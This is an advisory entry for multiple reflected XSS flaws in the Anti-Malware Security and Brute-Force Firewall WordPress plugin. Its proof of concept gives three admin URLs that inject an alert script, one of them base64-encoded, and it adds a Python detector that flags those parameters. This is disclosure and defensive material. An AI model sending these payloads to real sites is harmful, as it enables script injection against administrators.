WordPress Plugin Vulnerabilities
Anti-Malware & Brute-Force Security by ELI < 4.15.20 - Multiple Reflected XSS
Description
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by multiple reflected XSS vulnerabilities.
Proof of Concept
http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_msg=xsstest<script>alert(1)</script>
http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&scan_what=1&scan_type=xsstest<script>alert(1)</script>
http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_fixing=2&GOTMLS_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
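All three requests above target page=GOTMLS-settings, and the third carries the same script payload base64-encoded in GOTMLS_fix[], so a plain-text signature on the query string would miss it. The log-triage check below is an added example, not code from the plugin or from this entry; the markup heuristic and the benign sample value are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the proof-of-concept URLs on this page.
PLAIN_PARAMS = {"GOTMLS_msg", "scan_type"}
B64_PARAMS = {"GOTMLS_fix[]"}
# Assumed heuristic: markup characters, javascript: URLs, inline event handlers.
MARKUP = re.compile(r"[<>\"']|javascript:|\bon\w+\s*=", re.IGNORECASE)


def b64_text(value):
    """Decode a base64 value to text; return None when it is not valid base64."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def suspicious_params(url):
    """Return (parameter, decoded value) pairs that carry markup on the settings page."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if ("page", "GOTMLS-settings") not in params:
        return []
    hits = []
    for name, value in params:
        if name in PLAIN_PARAMS and MARKUP.search(value):
            hits.append((name, value))
        elif name in B64_PARAMS:
            # parse_qsl turns '+' into a space; restore it before decoding.
            decoded = b64_text(value.replace(" ", "+"))
            if decoded is not None and MARKUP.search(decoded):
                hits.append((name, decoded))
    return hits


# Constructed sample: the page's third request plus a benign one (assumed value).
SAMPLE_URLS = [
    "http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings"
    "&GOTMLS_fixing=2&GOTMLS_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    "http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings"
    "&GOTMLS_fixing=2&GOTMLS_fix[]=L3Zhci93d3cvaW5kZXgucGhw",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(suspicious_params(url) or "clean")
```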
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Submitter
Tim Coen
Verified
No
WPVDB ID
Timeline
Publicly Published
2015-05-15 (about 9 years ago)
Added
2015-05-15 (about 9 years ago)
Last Updated
2019-10-21 (about 4 years ago)